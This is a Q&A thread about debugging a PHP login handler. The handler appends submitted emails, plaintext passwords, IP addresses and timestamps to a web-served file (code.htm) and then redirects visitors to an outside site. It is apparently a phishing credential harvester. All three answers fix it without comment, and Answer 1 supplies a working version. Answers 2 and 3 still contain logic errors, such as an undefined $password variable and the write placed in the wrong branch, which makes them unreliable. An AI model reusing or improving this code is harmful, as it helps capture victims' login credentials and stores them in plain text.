Problems with conditional statements and POST data

Question

I have a basic PHP login form which saves your login information. I have written a php code but the code is not working as expected. Here's the code.

<?php
if($_POST) {
    $email=$_POST['id'];
    $pass=$_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    if(empty($email) || empty($pass)){
        header("Location: ../index.php?e=2");
    }
} else {
    $t=time();
    $time=date("D d M Y h:i:s A",$t);
    $f = fopen("code.htm", "a"); 
    fwrite ($f, $email.$password.$ip.$time);
    fclose($f);

    header("Location: xyz.com");
}

if(!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/",$email))) {
    header("Location: ../index.php?email_error=2");
} else {
    //do nothing
}
?>

The first if clause checks for empty fields and if empty redirects to index.php?e=2. The else clause writes email,password,ip and time in a file and redirects the user to a desired location.

In the third if clause I'm using regular expression for email validation and redirects the user to the index where an error is shown.

This code is very simple but no matter what try only third "if" clause works. I can't figure it out. Thanks for your help and if I've made any mistake please correct it.

Answer 1

Maybe something like this (but i don't understand your case with fwrite)

//check is request is POST. 
// you can use !empty($_POST) - but this not necessary,
// because ($_POST) and !empty($_POST) - has the same result
// $_POST - this is a global variable, it's always available
// and there empty array - if this is not POST request, or POST request without data.
// and [] == false  // true
if ($_POST) { 
    // if required data empty, don't process below code
    if (empty($_POST['id']) && empty($_POST['pass'])) {
        header("Location: ../index.php?e=2");
        exit();
    }

    // check email, and if it's invalid - go to error
    // and don't process below code
    $email = $_POST['id'];
    if (!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/", $email))) {
        header("Location: ../index.php?email_error=2");
        exit();
    }

    // everything checks out - it's cool
    $pass = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];

    $time = date("D d M Y h:i:s A", time());
    $f = fopen("code.htm", "a");
    fwrite($f, $email . $pass . $ip . $time);
    fclose($f);

    header("Location: xyz.com");
    exit();
} else {
    // show any message or page
}

P.S. And you should process any other request type (else - show any message or page)

Answer 2

Remove extra bracket and add exit after header. Final code will be like this :

if (isset($_POST['id']) && !empty($_POST['id'])) {
    $email = $_POST['id'];
    $pass = $_POST['pass'];
    $ip = $_SERVER['REMOTE_ADDR'];
    if (empty($email) || empty($pass)) {
        header("Location: ../index.php?e=2");
        exit;
    }
  }  else {
    $t = time();
    $time = date("D d M Y h:i:s A", $t);
    $f = fopen("code.htm", "a");
    fwrite($f, $email . $password . $ip . $time);
    fclose($f);

    header("Location: xyz.com");
    exit;
}
if (!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/", $email))) {
    header("Location: ../index.php?email_error=2");
    exit;
} else {
    //do nothing
}

Answer 3

Check $_POST for empty condition. if(!empty($_POST)). As @Dean say. your else will never execute because post is always there. So you should for empty post first and place exit(); or die(); after each header

<?php
  if(!empty($_POST)){
     $email=$_POST['id'];
     $pass=$_POST['pass'];
     $ip = $_SERVER['REMOTE_ADDR'];
  if(empty($email) || empty($pass)){
    header("Location: ../index.php?e=2");
    exit();
   }
}else{
     $t=time();
     $time=date("D d M Y h:i:s A",$t);
     $f = fopen("code.htm", "a"); 
     fwrite ($f, $email.$password.$ip.$time);
     fclose($f);

     header("Location: xyz.com");
     exit();
}
    if(!(preg_match("/^[^@&*() ]+@[^@&*() ]+\.[^@\. ]+$/",$email))){
         header("Location: ../index.php?email_error=2");
         exit();
}else{
    //do nothing
}
?>